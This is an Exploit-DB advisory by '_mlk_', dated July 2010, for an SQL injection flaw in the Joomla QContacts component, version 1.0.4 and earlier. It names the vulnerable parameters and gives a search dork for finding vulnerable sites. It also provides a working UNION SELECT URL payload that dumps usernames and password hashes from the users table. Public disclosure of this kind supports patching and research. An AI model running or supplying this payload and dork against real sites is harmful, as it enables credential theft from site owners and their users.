Joomla! Component com_qcontacts – SQL Injection

• Exploit Database
• 34 阅读

• 作者： _mlk_
  日期： 2010-07-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14350/

• # Exploit Title: Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability
  # Date: 12, July 2010
  
  # Author:_mlk_
  # Software Link: http://bugsec.googlecode.com/files/Joomla_com_qcontacts.zip
  # Version: 1.0.4 and previous
  # Tested on: all OS
  
  # CVE : 0
  
  # Code : here
  
  Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability
  
  #################################################################################################################
  
  
   [+] Discovered by : _mlk_ (Renan)
  
   [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
  
   [+] Homepages :http://code.google.com/p/bugsec/
  http://botecounix.com.br/blog/
  http://c0d3rs.wordpress.com/
  
   [+] Location : Porto Alegre - RS, Brasil
   (or Brazil)
  
  #################################################################################################################
  
  
  [-] Information
  
   [?] Script : QContacts
  
   [?] FAQ : http://www.latenight-coding.com/joomla-addons/qcontacts.html
  
   [?] Versions Tested: 1.0.4 and previous
  
   [?] Dork/String :"index.php?option=com_qcontacts" / "com_qcontacts"
  
   [?] Date :12, July 2010
  
  
  -----------------------------------------------------------------------------------------------------------------
  
  
  [*] Parameters vuls :
  
   Itemid
   id
   catid
  
  
  -----------------------------------------------------------------------------------------------------------------
  
  
  [*] Example :
  
   http://localhost/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]
   http://localhost/[PATH]/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]
  
  
  -----------------------------------------------------------------------------------------------------------------
  
  
  [*] Demo :
  
   http://<server>/path/index.php?option=com_qcontacts&view=contact&id=1&Itemid=-541
   +union+select+concat(id,0x3a,name,0x3a,username,0x3a,password)+from+cms01_users--
  
  
  #################################################################################################################
  
  
  [~] Agradecimentos :
  
  Deus , Familiares , Amigos e Tricolor Gaúcho (Grêmio) .
  Em especial "i4k" ( alien \o/ ) .
  
  
  #################################################################################################################